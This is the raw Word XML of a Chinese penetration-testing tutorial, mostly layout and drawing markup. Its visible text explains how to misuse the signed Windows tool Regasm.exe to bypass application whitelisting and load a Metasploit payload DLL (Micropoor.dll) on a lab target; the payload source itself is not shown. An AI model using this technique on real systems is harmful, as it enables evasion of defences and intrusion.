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874pt;margin-top:433.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,8677" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:8677;width:82;height:322" coordorigin="1177,8677" coordsize="82,322" path="m1217,8683l1217,8683,1217,8683,1217,8683,1217,8683,1217,8683,1217,8683,1217,8683,1217,8683,1217,8683,1217,8684,1217,8684,1217,8684,1217,8684,1217,8684,1217,8684,1217,8684,1217,8684,1217,8684,1217,8684,1217,8685,1217,8685,1217,8685,1217,8685,1217,8686,1217,8686,1217,8686,1217,8687,1217,8687,1217,8687,1217,8688,1217,8688,1217,8689,1217,8689,1217,8690,1217,8690,1217,8691,1217,8692,1217,8692,1217,8693,1217,8694,1217,8695,1217,8696,1217,8697,1217,8698,1217,8699,1217,8700,1217,8701,1217,8702,1217,8703,1217,8704,1217,8706,1217,8707,1217,8708,1217,8710,1217,8711,1217,8713,1217,8715,1217,8716,1217,8718,1217,8720,1217,8722,1217,8724,1217,8726,1217,8728,1217,8730,1217,8732,1217,8735,1217,8737,1217,8739,1217,8742,1217,8744,1217,8747,1217,8750,1217,8753,1217,8756,1217,8759,1217,8762,1217,8765,1217,8768,1217,8771,1217,8775,1217,8778,1217,8782,1217,8785,1217,8789,1217,8793,1217,8797,1217,8801,1217,8805,1217,8809,1217,8813,1217,8818,1217,8822,1217,8827,1217,8831,1217,8836,1217,8841,1217,8846,1217,8851,1217,8856,1217,8861,1217,8867,1217,8872,1217,8878,1217,8884,1217,8890,1217,8896,1217,8902,1217,8908,1217,8914,1217,8920,1217,8927,1217,8934,1217,8940,1217,8947,1217,8954,1217,8961,1217,8969,1217,8976,1217,8984e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7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7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Regasm简</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="26"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>介：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733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Regasm为程序集注册工具，读取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程序集中的元数据，并将所需的项添加到注册表中。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RegAsm.exe是Microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-82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Corporation开发的合法文件进程。它与Microsoft.NET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Assembly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Registration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Utility相关联。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328" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>说明：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Regasm.ex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e所在路径没有被系统添加PATH环境变量中，因此，REGASM命令无法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识别。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85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具体参考微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>软官方文档：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://docs.microsoft.com/en-us/dotn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>et/framework/tools/regasm-exe-assembly-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3783"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>registr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>ation-tool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基于白名单Regasm.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exe配置payload：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7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默认位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="75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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Windows\Microsoft.NET\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Framework\v4.0.30319\regasm.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="27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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击机：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192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="57"/>
        </w:rPr>
        <w:t> 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Debian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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="7131" w:firstLine="0"/>
      </w:pP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6"/>
        </w:rPr>
        <w:t> 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192.168.1.3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7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配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置攻击机msf：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74.500pt;margin-top:403.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,8070" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:8070;width:8990;height:690" coordorigin="1490,8070" coordsize="8990,690" path="m1510,8098l1510,8098,1510,8098,1510,8098,1510,8098,1510,8098,1510,8098,1511,8098,1512,8098,1512,8098,1514,8098,1515,8098,1517,8098,1519,8098,1521,8098,1524,8098,1528,8098,1532,8098,1536,8098,1541,8098,1546,8098,1552,8098,1559,8098,1566,8098,1575,8098,1583,8098,1593,8098,1603,8098,1615,8098,1627,8098,1640,8098,1654,8098,1668,8098,1684,8098,1701,8098,1719,8098,1738,8098,1758,8098,1780,8098,1802,8098,1826,8098,1851,8098,1877,8098,1904,8098,1933,8098,1963,8098,1995,8098,2028,8098,2063,8098,2099,8098,2136,8098,2175,8098,2216,8098,2259,8098,2303,8098,2348,8098,2396,8098,2445,8098,2496,8098,2549,8098,2604,8098,2660,8098,2719,8098,2779,8098,2841,8098,2906,8098,2972,8098,3041,8098,3112,8098,3184,8098,3259,8098,3336,8098,3416,8098,3498,8098,3582,8098,3668,8098,3757,8098,3848,8098,3941,8098,4037,8098,4136,8098,4236,8098,4340,8098,4446,8098,4555,8098,4666,8098,4780,8098,4897,8098,5017,8098,5139,8098,5264,8098,5392,8098,5523,8098,5657,8098,5793,8098,5933,8098,6076,8098,6222,8098,6370,8098,6522,8098,6677,8098,6835,8098,6997,8098,7161,8098,7329,8098,7500,8098,7675,8098,7853,8098,8034,8098,8219,8098,8407,8098,8598,8098,8793,8098,8992,8098,9194,8098,9400,8098,9609,8098,9823,8098,10039,8098,10260,8098,10484,8098,10484,8098,10484,8098,10484,8098,10484,8098,10484,8098,10484,8098,10484,8098,10484,8098,10484,8098,10484,8098,10484,8098,10484,8099,10484,8099,10484,8099,10484,8099,10484,8099,10484,8100,10484,8100,10484,8100,10484,8101,10484,8101,10484,8102,10484,8102,10484,8103,10484,8104,10484,8104,10484,8105,10484,8106,10484,8107,10484,8108,10484,8109,10484,8110,10484,8111,10484,8112,10484,8114,10484,8115,10484,8117,10484,8118,10484,8120,10484,8122,10484,8124,10484,8126,10484,8128,10484,8130,10484,8132,10484,8135,10484,8137,10484,8140,10484,8142,10484,8145,10484,8148,10484,8151,10484,8154,10484,8158,10484,8161,10484,8165,10484,8168,10484,8172,10484,8176,10484,8180,10484,8185,10484,8189,10484,8194,10484,8198,10484,8203,10484,8208,10484,8213,10484,8219,10484,8224,10484,8230,10484,8236,10484,8242,10484,8248,10484,8254,10484,8260,10484,8267,10484,8274,10484,8281,10484,8288,10484,8296,10484,8303,10484,8311,10484,8319,10484,8327,10484,8336,10484,8344,10484,8353,10484,8362,10484,8371,10484,8381,10484,8390,10484,8400,10484,8410,10484,8420,10484,8431,10484,8442,10484,8453,10484,8464,10484,8475,10484,8487,10484,8499,10484,8511,10484,8523,10484,8536,10484,8549,10484,8562,10484,8575,10484,8589,10484,8603,10484,8617,10484,8631,10484,8646,10484,8661,10484,8676,10484,8692,10484,8708,10484,8724,10484,8740,10484,8757,10484,8773,10484,8773,10484,8773,10484,8773,10484,8773,10484,8773,10484,8773,10483,8773,10482,8773,10482,8773,10480,8773,10479,8773,10477,8773,10475,8773,10473,8773,10470,8773,10466,8773,10462,8773,10458,8773,10453,8773,10448,8773,10442,8773,10435,8773,10428,8773,10419,8773,10411,8773,10401,8773,10391,8773,10379,8773,10367,8773,10354,8773,10340,8773,10326,8773,10310,8773,10293,8773,10275,8773,10256,8773,10236,8773,10215,8773,10192,8773,10168,8773,10143,8773,10117,8773,10090,8773,10061,8773,10031,8773,9999,8773,9966,8773,9931,8773,9895,8773,9858,8773,9819,8773,9778,8773,9735,8773,9691,8773,9646,8773,9598,8773,9549,8773,9498,8773,9445,8773,9391,8773,9334,8773,9275,8773,9215,8773,9153,8773,9088,8773,9022,8773,8953,8773,8883,8773,8810,8773,8735,8773,8658,8773,8578,8773,8497,8773,8413,8773,8326,8773,8238,8773,8146,8773,8053,8773,7957,8773,7859,8773,7758,8773,7654,8773,7548,8773,7439,8773,7328,8773,7214,8773,7097,8773,6977,8773,6855,8773,6730,8773,6602,8773,6471,8773,6337,8773,6201,8773,6061,8773,5918,8773,5773,8773,5624,8773,5472,8773,5317,8773,5159,8773,4997,8773,4833,8773,4665,8773,4494,8773,4319,8773,4141,8773,3960,8773,3776,8773,3587,8773,3396,8773,3201,8773,3002,8773,2800,8773,2594,8773,2385,8773,2172,8773,1955,8773,1734,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8773,1510,8772,1510,8772,1510,8772,1510,8771,1510,8771,1510,8771,1510,8770,1510,8770,1510,8769,1510,8769,1510,8768,1510,8767,1510,8766,1510,8766,1510,8765,1510,8764,1510,8763,1510,8761,1510,8760,1510,8759,1510,8758,1510,8756,1510,8755,1510,8753,1510,8751,1510,8750,1510,8748,1510,8746,1510,8744,1510,8742,1510,8739,1510,8737,1510,8734,1510,8732,1510,8729,1510,8726,1510,8723,1510,8720,1510,8717,1510,8714,1510,8710,1510,8707,1510,8703,1510,8699,1510,8695,1510,8691,1510,8687,1510,8682,1510,8678,1510,8673,1510,8668,1510,8663,1510,8658,1510,8653,1510,8647,1510,8642,1510,8636,1510,8630,1510,8624,1510,8618,1510,8611,1510,8604,1510,8597,1510,8590,1510,8583,1510,8576,1510,8568,1510,8560,1510,8552,1510,8544,1510,8536,1510,8527,1510,8519,1510,8510,1510,8500,1510,8491,1510,8481,1510,8471,1510,8461,1510,8451,1510,8441,1510,8430,1510,8419,1510,8408,1510,8396,1510,8385,1510,8373,1510,8361,1510,8348,1510,8335,1510,8323,1510,8309,1510,8296,1510,8282,1510,8269,1510,8254,1510,8240,1510,8225,1510,8210,1510,8195,1510,8180,1510,8164,1510,8148,1510,8132,1510,8115,1510,8098e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:403.800pt;width:445.800pt;height:35.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:294.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:458.400pt;width:467.400pt;height:225.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0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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：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2750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C:\Windows\Microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="20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NET\Framework\v4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="18"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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0.30319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\regasm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Micropoor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dll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54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8459" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="18"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>附录：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Micropoor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.cs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：x86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-39"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload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49.999pt;width:0.0pt;height:792.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,1000" coordsize="0,15840">
        <v:shape style="position:absolute;left:10402;top:1000;width:0;height:15840" coordorigin="10402,1000" coordsize="0,15840" path="m10402,1000l10402,1000,10402,1000,10402,1000,10402,1000,10402,1000,10402,1001,10402,1002,10402,1003,10402,1004,10402,1006,10402,1009,10402,1012,10402,1016,10402,1020,10402,1025,10402,1031,10402,1038,10402,1046,10402,1054,10402,1064,10402,1075,10402,1087,10402,1100,10402,1114,10402,1129,10402,1146,10402,1165,10402,1185,10402,1206,10402,1229,10402,1253,10402,1280,10402,1308,10402,1337,10402,1369,10402,1403,10402,1438,10402,1476,10402,1515,10402,1557,10402,1601,10402,1647,10402,1696,10402,1747,10402,1800,10402,1856,10402,1914,10402,1975,10402,2039,10402,2105,10402,2174,10402,2246,10402,2321,10402,2399,10402,2480,10402,2563,10402,2650,10402,2740,10402,2833,10402,2930,10402,3030,10402,3133,10402,3240,10402,3350,10402,3464,10402,3581,10402,3702,10402,3827,10402,3955,10402,4087,10402,4224,10402,4364,10402,4508,10402,4656,10402,4808,10402,4965,10402,5126,10402,5291,10402,5460,10402,5634,10402,5812,10402,5995,10402,6182,10402,6374,10402,6571,10402,6772,10402,6978,10402,7189,10402,7405,10402,7626,10402,7852,10402,8083,10402,8319,10402,8560,10402,8807,10402,9059,10402,9316,10402,9578,10402,9846,10402,10120,10402,10399,10402,10684,10402,10975,10402,11271,10402,11573,10402,11881,10402,12195,10402,12515,10402,12840,10402,13172,10402,13511,10402,13855,10402,14205,10402,14562,10402,14926,10402,15295,10402,15671,10402,16054,10402,16444,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:47.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,950">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:950" coordorigin="1490,970" coordsize="8990,95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1,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1012,10484,1013,10484,1014,10484,1016,10484,1018,10484,1019,10484,1021,10484,1023,10484,1025,10484,1027,10484,1030,10484,1032,10484,1035,10484,1038,10484,1040,10484,1043,10484,1047,10484,1050,10484,1053,10484,1057,10484,1061,10484,1064,10484,1069,10484,1073,10484,1077,10484,1082,10484,1086,10484,1091,10484,1096,10484,1102,10484,1107,10484,1113,10484,1119,10484,1125,10484,1131,10484,1138,10484,1144,10484,1151,10484,1158,10484,1166,10484,1173,10484,1181,10484,1189,10484,1197,10484,1206,10484,1214,10484,1223,10484,1232,10484,1242,10484,1252,10484,1262,10484,1272,10484,1282,10484,1293,10484,1304,10484,1315,10484,1327,10484,1339,10484,1351,10484,1363,10484,1376,10484,1389,10484,1402,10484,1416,10484,1429,10484,1444,10484,1458,10484,1473,10484,1488,10484,1503,10484,1519,10484,1535,10484,1552,10484,1568,10484,1585,10484,1603,10484,1621,10484,1639,10484,1657,10484,1676,10484,1695,10484,1715,10484,1734,10484,1755,10484,1775,10484,1796,10484,1818,10484,1839,10484,1861,10484,1884,10484,1907,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10483,1930,10482,1930,10482,1930,10480,1930,10479,1930,10477,1930,10475,1930,10473,1930,10470,1930,10466,1930,10462,1930,10458,1930,10453,1930,10448,1930,10442,1930,10435,1930,10428,1930,10419,1930,10411,1930,10401,1930,10391,1930,10379,1930,10367,1930,10354,1930,10340,1930,10326,1930,10310,1930,10293,1930,10275,1930,10256,1930,10236,1930,10215,1930,10192,1930,10168,1930,10143,1930,10117,1930,10090,1930,10061,1930,10031,1930,9999,1930,9966,1930,9931,1930,9895,1930,9858,1930,9819,1930,9778,1930,9735,1930,9691,1930,9646,1930,9598,1930,9549,1930,9498,1930,9445,1930,9391,1930,9334,1930,9275,1930,9215,1930,9153,1930,9088,1930,9022,1930,8953,1930,8883,1930,8810,1930,8735,1930,8658,1930,8578,1930,8497,1930,8413,1930,8326,1930,8238,1930,8146,1930,8053,1930,7957,1930,7859,1930,7758,1930,7654,1930,7548,1930,7439,1930,7328,1930,7214,1930,7097,1930,6977,1930,6855,1930,6730,1930,6602,1930,6471,1930,6337,1930,6201,1930,6061,1930,5918,1930,5773,1930,5624,1930,5472,1930,5317,1930,5159,1930,4997,1930,4833,1930,4665,1930,4494,1930,4319,1930,4141,1930,3960,1930,3776,1930,3587,1930,3396,1930,3201,1930,3002,1930,2800,1930,2594,1930,2385,1930,2172,1930,1955,1930,1734,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1929,1510,1929,1510,1929,1510,1929,1510,1928,1510,1928,1510,1928,1510,1927,1510,1927,1510,1926,1510,1926,1510,1925,1510,1924,1510,1923,1510,1922,1510,1921,1510,1920,1510,1919,1510,1918,1510,1917,1510,1915,1510,1914,1510,1912,1510,1910,1510,1908,1510,1906,1510,1904,1510,1902,1510,1900,1510,1897,1510,1895,1510,1892,1510,1889,1510,1886,1510,1883,1510,1880,1510,1876,1510,1873,1510,1869,1510,1865,1510,1861,1510,1857,1510,1852,1510,1848,1510,1843,1510,1838,1510,1833,1510,1828,1510,1822,1510,1817,1510,1811,1510,1805,1510,1798,1510,1792,1510,1785,1510,1778,1510,1771,1510,1764,1510,1756,1510,1749,1510,1741,1510,1732,1510,1724,1510,1715,1510,1706,1510,1697,1510,1688,1510,1678,1510,1668,1510,1658,1510,1647,1510,1637,1510,1626,1510,1614,1510,1603,1510,1591,1510,1579,1510,1566,1510,1554,1510,1541,1510,1527,1510,1514,1510,1500,1510,1486,1510,1471,1510,1457,1510,1441,1510,1426,1510,1410,1510,1394,1510,1378,1510,1361,1510,1344,1510,1327,1510,1309,1510,1291,1510,1272,1510,1254,1510,1234,1510,1215,1510,1195,1510,1175,1510,1154,1510,1133,1510,1112,1510,1090,1510,1068,1510,1046,1510,1023,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.600pt;width:445.800pt;height:47.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:95.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1910" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1910;width:8990;height:370" coordorigin="1490,1910" coordsize="8990,370" path="m1510,1930l1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1510,1930,1511,1930,1512,1930,1512,1930,1514,1930,1515,1930,1517,1930,1519,1930,1521,1930,1524,1930,1528,1930,1532,1930,1536,1930,1541,1930,1546,1930,1552,1930,1559,1930,1566,1930,1575,1930,1583,1930,1593,1930,1603,1930,1615,1930,1627,1930,1640,1930,1654,1930,1668,1930,1684,1930,1701,1930,1719,1930,1738,1930,1758,1930,1780,1930,1802,1930,1826,1930,1851,1930,1877,1930,1904,1930,1933,1930,1963,1930,1995,1930,2028,1930,2063,1930,2099,1930,2136,1930,2175,1930,2216,1930,2259,1930,2303,1930,2348,1930,2396,1930,2445,1930,2496,1930,2549,1930,2604,1930,2660,1930,2719,1930,2779,1930,2841,1930,2906,1930,2972,1930,3041,1930,3112,1930,3184,1930,3259,1930,3336,1930,3416,1930,3498,1930,3582,1930,3668,1930,3757,1930,3848,1930,3941,1930,4037,1930,4136,1930,4236,1930,4340,1930,4446,1930,4555,1930,4666,1930,4780,1930,4897,1930,5017,1930,5139,1930,5264,1930,5392,1930,5523,1930,5657,1930,5793,1930,5933,1930,6076,1930,6222,1930,6370,1930,6522,1930,6677,1930,6835,1930,6997,1930,7161,1930,7329,1930,7500,1930,7675,1930,7853,1930,8034,1930,8219,1930,8407,1930,8598,1930,8793,1930,8992,1930,9194,1930,9400,1930,9609,1930,9823,1930,10039,1930,10260,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1930,10484,1931,10484,1931,10484,1931,10484,1931,10484,1931,10484,1931,10484,1932,10484,1932,10484,1932,10484,1933,10484,1933,10484,1933,10484,1934,10484,1934,10484,1935,10484,1935,10484,1936,10484,1936,10484,1937,10484,1938,10484,1938,10484,1939,10484,1940,10484,1941,10484,1942,10484,1943,10484,1944,10484,1945,10484,1946,10484,1947,10484,1948,10484,1949,10484,1951,10484,1952,10484,1954,10484,1955,10484,1957,10484,1958,10484,1960,10484,1962,10484,1964,10484,1966,10484,1968,10484,1970,10484,1972,10484,1974,10484,1976,10484,1978,10484,1981,10484,1983,10484,1986,10484,1989,10484,1991,10484,1994,10484,1997,10484,2000,10484,2003,10484,2006,10484,2010,10484,2013,10484,2017,10484,2020,10484,2024,10484,2028,10484,2031,10484,2035,10484,2039,10484,2044,10484,2048,10484,2052,10484,2057,10484,2061,10484,2066,10484,2071,10484,2076,10484,2081,10484,2086,10484,2091,10484,2096,10484,2102,10484,2107,10484,2113,10484,2119,10484,2125,10484,2131,10484,2137,10484,2144,10484,2150,10484,2157,10484,2164,10484,2170,10484,2177,10484,2185,10484,2192,10484,2199,10484,2207,10484,2214,10484,2222,10484,2230,10484,2238,10484,2247,10484,2255,10484,2264,10484,2272,10484,2281,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10484,2290,10483,2290,10482,2290,10482,2290,10480,2290,10479,2290,10477,2290,10475,2290,10473,2290,10470,2290,10466,2290,10462,2290,10458,2290,10453,2290,10448,2290,10442,2290,10435,2290,10428,2290,10419,2290,10411,2290,10401,2290,10391,2290,10379,2290,10367,2290,10354,2290,10340,2290,10326,2290,10310,2290,10293,2290,10275,2290,10256,2290,10236,2290,10215,2290,10192,2290,10168,2290,10143,2290,10117,2290,10090,2290,10061,2290,10031,2290,9999,2290,9966,2290,9931,2290,9895,2290,9858,2290,9819,2290,9778,2290,9735,2290,9691,2290,9646,2290,9598,2290,9549,2290,9498,2290,9445,2290,9391,2290,9334,2290,9275,2290,9215,2290,9153,2290,9088,2290,9022,2290,8953,2290,8883,2290,8810,2290,8735,2290,8658,2290,8578,2290,8497,2290,8413,2290,8326,2290,8238,2290,8146,2290,8053,2290,7957,2290,7859,2290,7758,2290,7654,2290,7548,2290,7439,2290,7328,2290,7214,2290,7097,2290,6977,2290,6855,2290,6730,2290,6602,2290,6471,2290,6337,2290,6201,2290,6061,2290,5918,2290,5773,2290,5624,2290,5472,2290,5317,2290,5159,2290,4997,2290,4833,2290,4665,2290,4494,2290,4319,2290,4141,2290,3960,2290,3776,2290,3587,2290,3396,2290,3201,2290,3002,2290,2800,2290,2594,2290,2385,2290,2172,2290,1955,2290,1734,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2290,1510,2289,1510,2289,1510,2289,1510,2289,1510,2289,1510,2288,1510,2288,1510,2288,1510,2288,1510,2287,1510,2287,1510,2286,1510,2286,1510,2285,1510,2285,1510,2284,1510,2284,1510,2283,1510,2282,1510,2282,1510,2281,1510,2280,1510,2279,1510,2278,1510,2277,1510,2276,1510,2275,1510,2274,1510,2273,1510,2272,1510,2271,1510,2269,1510,2268,1510,2267,1510,2265,1510,2263,1510,2262,1510,2260,1510,2258,1510,2256,1510,2255,1510,2253,1510,2251,1510,2248,1510,2246,1510,2244,1510,2242,1510,2239,1510,2237,1510,2234,1510,2231,1510,2229,1510,2226,1510,2223,1510,2220,1510,2217,1510,2214,1510,2210,1510,2207,1510,2204,1510,2200,1510,2196,1510,2193,1510,2189,1510,2185,1510,2181,1510,2177,1510,2172,1510,2168,1510,2163,1510,2159,1510,2154,1510,2149,1510,2144,1510,2139,1510,2134,1510,2129,1510,2124,1510,2118,1510,2113,1510,2107,1510,2101,1510,2095,1510,2089,1510,2083,1510,2076,1510,2070,1510,2063,1510,2057,1510,2050,1510,2043,1510,2036,1510,2028,1510,2021,1510,2013,1510,2006,1510,1998,1510,1990,1510,1982,1510,1973,1510,1965,1510,1957,1510,1948,1510,1939,1510,1930e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:95.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1910" coordsize="30,370">
